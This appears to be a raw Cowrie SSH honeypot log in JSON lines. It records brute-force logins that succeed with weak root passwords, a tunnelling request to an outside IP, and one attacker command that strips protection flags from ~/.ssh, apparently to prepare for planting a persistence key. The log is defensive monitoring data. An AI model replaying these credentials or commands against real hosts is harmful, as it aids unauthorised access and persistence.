{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:06:10.667226Z","src_ip":"212.227.235.229","session":"7f0c786003fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:06:10.667919Z","src_ip":"212.227.235.229","session":"7f0c786003fc"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:06:10.670267Z","src_ip":"212.227.235.229","session":"7f0c786003fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57830,"dst_ip":"1.2.3.4","dst_port":22,"session":"c089605c9181","protocol":"ssh","message":"New connection: 212.227.235.229:57830 (1.2.3.4:22) [session: c089605c9181]","sensor":"my-vps","timestamp":"2025-08-26T19:06:28.678623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:06:30.064496Z","src_ip":"212.227.235.229","session":"c089605c9181"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:06:30.065215Z","src_ip":"212.227.235.229","session":"c089605c9181"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123!","message":"login attempt [root/Password123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:06:34.078005Z","src_ip":"212.227.235.229","session":"c089605c9181"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:06:34.530634Z","src_ip":"212.227.235.229","session":"c089605c9181"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":56846,"dst_ip":"1.2.3.4","dst_port":22,"session":"e76cbce901ab","protocol":"ssh","message":"New connection: 45.88.8.215:56846 (1.2.3.4:22) [session: e76cbce901ab]","sensor":"my-vps","timestamp":"2025-08-26T19:06:38.806603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:06:39.301478Z","src_ip":"45.88.8.215","session":"e76cbce901ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:06:39.302132Z","src_ip":"45.88.8.215","session":"e76cbce901ab"}
{"eventid":"cowrie.login.success","username":"root","password":"Nirek@123","message":"login attempt [root/Nirek@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:06:41.274637Z","src_ip":"45.88.8.215","session":"e76cbce901ab"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:06:41.637954Z","src_ip":"45.88.8.215","session":"e76cbce901ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45295,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c047ade07a7","protocol":"ssh","message":"New connection: 212.227.235.229:45295 (1.2.3.4:22) [session: 8c047ade07a7]","sensor":"my-vps","timestamp":"2025-08-26T19:06:48.355322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:06:48.357804Z","src_ip":"212.227.235.229","session":"8c047ade07a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:06:48.624835Z","src_ip":"212.227.235.229","session":"8c047ade07a7"}
{"eventid":"cowrie.login.failed","username":"bitwarden","password":"1234","message":"login attempt [bitwarden/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T19:06:49.672480Z","src_ip":"212.227.235.229","session":"8c047ade07a7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:06:50.937248Z","src_ip":"212.227.235.229","session":"8c047ade07a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35217,"dst_ip":"1.2.3.4","dst_port":22,"session":"aed6ef9661fd","protocol":"ssh","message":"New connection: 212.227.235.229:35217 (1.2.3.4:22) [session: aed6ef9661fd]","sensor":"my-vps","timestamp":"2025-08-26T19:06:53.014450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:06:53.015465Z","src_ip":"212.227.235.229","session":"aed6ef9661fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:06:53.473324Z","src_ip":"212.227.235.229","session":"aed6ef9661fd"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:06:58.173232Z","src_ip":"212.227.235.229","session":"aed6ef9661fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46765,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6b846b9fe12","protocol":"ssh","message":"New connection: 212.227.235.229:46765 (1.2.3.4:22) [session: f6b846b9fe12]","sensor":"my-vps","timestamp":"2025-08-26T19:07:40.908764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:07:40.910178Z","src_ip":"212.227.235.229","session":"f6b846b9fe12"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:07:41.291741Z","src_ip":"212.227.235.229","session":"f6b846b9fe12"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:07:47.494357Z","src_ip":"212.227.235.229","session":"f6b846b9fe12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57989,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a770d2404bf","protocol":"ssh","message":"New connection: 212.227.235.229:57989 (1.2.3.4:22) [session: 8a770d2404bf]","sensor":"my-vps","timestamp":"2025-08-26T19:07:58.469975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:07:58.471158Z","src_ip":"212.227.235.229","session":"8a770d2404bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:07:58.723693Z","src_ip":"212.227.235.229","session":"8a770d2404bf"}
{"eventid":"cowrie.login.failed","username":"jupyter","password":"jupyter","message":"login attempt [jupyter/jupyter] failed","sensor":"my-vps","timestamp":"2025-08-26T19:07:59.781945Z","src_ip":"212.227.235.229","session":"8a770d2404bf"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:08:01.039316Z","src_ip":"212.227.235.229","session":"8a770d2404bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51414,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ecc58737511","protocol":"ssh","message":"New connection: 212.227.125.160:51414 (1.2.3.4:22) [session: 7ecc58737511]","sensor":"my-vps","timestamp":"2025-08-26T19:08:02.179709Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:08:02.180846Z","src_ip":"212.227.125.160","session":"7ecc58737511"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51702,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d26b272d64","protocol":"ssh","message":"New connection: 212.227.125.160:51702 (1.2.3.4:22) [session: f2d26b272d64]","sensor":"my-vps","timestamp":"2025-08-26T19:08:02.292865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:08:02.293901Z","src_ip":"212.227.125.160","session":"f2d26b272d64"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T19:08:02.407857Z","src_ip":"212.227.125.160","session":"f2d26b272d64"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:08:02.749510Z","src_ip":"212.227.125.160","session":"f2d26b272d64"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T19:08:02.863719Z","session":"f2d26b272d64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59690,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f72aff3a88d","protocol":"ssh","message":"New connection: 212.227.235.229:59690 (1.2.3.4:22) [session: 8f72aff3a88d]","sensor":"my-vps","timestamp":"2025-08-26T19:08:28.914211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:08:28.915139Z","src_ip":"212.227.235.229","session":"8f72aff3a88d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:08:38.096433Z","src_ip":"212.227.235.229","session":"8f72aff3a88d"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:08:38.099152Z","src_ip":"212.227.235.229","session":"8f72aff3a88d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42452,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f46c1fa9a28","protocol":"ssh","message":"New connection: 212.227.235.229:42452 (1.2.3.4:22) [session: 7f46c1fa9a28]","sensor":"my-vps","timestamp":"2025-08-26T19:09:04.544908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:09:04.545915Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:09:04.802367Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:09:05.851012Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:09:06.426975Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:09:06.427804Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:09:06.428621Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:09:06.686886Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:09:07.221237Z","src_ip":"212.227.235.229","session":"7f46c1fa9a28"}
